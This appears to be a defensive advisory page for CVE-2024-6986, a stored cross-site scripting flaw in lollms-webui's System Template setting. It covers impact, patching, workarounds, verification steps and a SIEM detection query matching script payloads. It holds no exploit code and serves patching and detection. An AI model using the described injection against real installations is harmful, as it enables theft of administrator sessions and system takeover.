CVE-2024-6986
📋 TL;DR
A stored Cross-site Scripting (XSS) vulnerability in parisneo/lollms-webui allows attackers to inject malicious JavaScript into the System Template configuration. When administrators view the Settings page, the injected code executes in their browser context. This affects all users running vulnerable versions of the lollms-webui software.
💻 Affected Systems
- parisneo/lollms-webui
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Attacker gains administrative privileges by stealing session cookies or performing actions as the administrator, potentially leading to complete system compromise.
Likely Case
Attacker steals administrator session cookies, leading to unauthorized access to the web interface and potential data exfiltration.
If Mitigated
Limited impact if only trusted users can access the Settings page and input validation is performed elsewhere.
🎯 Exploit Status
Exploitation requires access to modify the System Template field, typically requiring some level of authentication or access to the configuration interface.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Version after 9.8
Vendor Advisory: https://huntr.com/bounties/83e9bde1-40b2-49e9-be1c-bc1498eb8ebd
Restart Required: Yes
Instructions:
1. Update to the latest version of lollms-webui. 2. Restart the webui service. 3. Verify the fix by checking that v-html directive is no longer used with untrusted input.
🔧 Temporary Workarounds
Input Sanitization
allImplement server-side input validation and sanitization for the System Template field
Modify the backend code to sanitize HTML input before storing in full_template variable
Restrict Settings Access
allLimit access to the Settings page to trusted administrators only
Configure web server or application firewall to restrict /settings path
🧯 If You Can't Patch
- Disable or restrict access to the Settings page entirely
- Implement Content Security Policy (CSP) headers to prevent script execution
🔍 How to Verify
Check if Vulnerable:
Check if running version 9.8 of lollms-webui and inspect if the Settings page uses v-html directive with full_template variableCheck Version:
Check the webui interface or configuration files for version informationVerify Fix Applied:
After updating, test if JavaScript payloads in System Template field are properly sanitized and do not execute📡 Detection & Monitoring
Log Indicators:
- Unusual modifications to System Template configuration
- JavaScript payloads in configuration logs
Network Indicators:
- Requests to Settings page with suspicious payloads in parameters
SIEM Query:
source="webui_logs" AND ("System Template" OR "full_template") AND ("<script>" OR "javascript:")